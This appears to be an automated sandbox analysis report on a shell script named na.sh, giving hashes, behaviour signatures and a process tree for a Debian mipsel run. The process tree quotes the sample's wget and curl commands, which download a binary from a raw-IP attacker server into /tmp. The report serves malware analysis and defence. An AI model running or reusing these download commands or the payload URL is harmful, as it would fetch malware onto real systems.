Overview

overview

10

Static

static

1

na.sh

ubuntu-18.04-amd64

10

na.sh

debian-9-armhf

7

na.sh

debian-9-mips

7

na.sh

debian-9-mipsel

5

Analysis

  • max time kernel
    149s
  • max time network
    120s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240729-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    17-10-2024 06:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    na.sh

  • Size

    4KB

  • MD5

    2d520ab45c89c24520e0754fd1971be2

  • SHA1

    96e5de0ce70de4fa0f1adcd586aa49608bd578ea

  • SHA256

    ebbb403ae5c2bf4cbfa72c30f5e061d73fa5465c0a7c455e18a2cc73b413d160

  • SHA512

    496e0ee73afc2d1263db3012dec1578c3d493229a28e4fe97d5b63390ed86441b0fc42bc3f7d494569209b8642e8f5c9e239907cd1b8124bdeff619ba85e902b

  • SSDEEP

    96:vNVjWNw41Nx/SNN7uNdMdEpFDNn90NUsRN2mHNRfCN3t8NueXNyS7NGWfNPl3:IO4Fi

Score
5/10
discoveryupx

Malware Config

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/na.sh
    /tmp/na.sh
    1⤵
      PID:707
      • /usr/bin/wget
        wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
        2⤵
        • Writes file to tmp directory
        PID:714
      • /usr/bin/curl
        curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:729

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • /tmp/db0fa4b8db0333367e9bda3ab68b8042.x86
      Filesize

      33KB

      MD5

      6d1b6e91b1e2037fbf62ca7ddcf04932

      SHA1

      d0769095ec2e678074eb206b3537022129c1a776

      SHA256

      7f307860b88d639313ebd4195f1ef6a8d668d1941c6cbf6dc968961b1fe42782

      SHA512

      7397ef3b4f7d34b0637de721f38ac833ad6d526e9b7cdbc08fdb4b261fa675001a8079ff4b9378fa219090a945126832cb1ab3db86b35da0090b20051d31bb38

      Download Submit

    • /tmp/db0fa4b8db0333367e9bda3ab68b8042.x86
      Filesize

      12KB

      MD5

      a8e956557c76d4fba9d3679273971588

      SHA1

      a5352daf5658a31cd597fd96fa94ecd1cff9b98e

      SHA256

      82d5cdad023ef58b606737907ad060549e2cb5976167856766fa9674fca5b650

      SHA512

      0bc0ca7f0c4c33292e9eecd3b8fa93c1fbb6dd535b5102600dc242a336abe57cc6c33d480c635e4e57f71832e6c346c6d0512dff3db91a433f8e7523c9905759

      Download Submit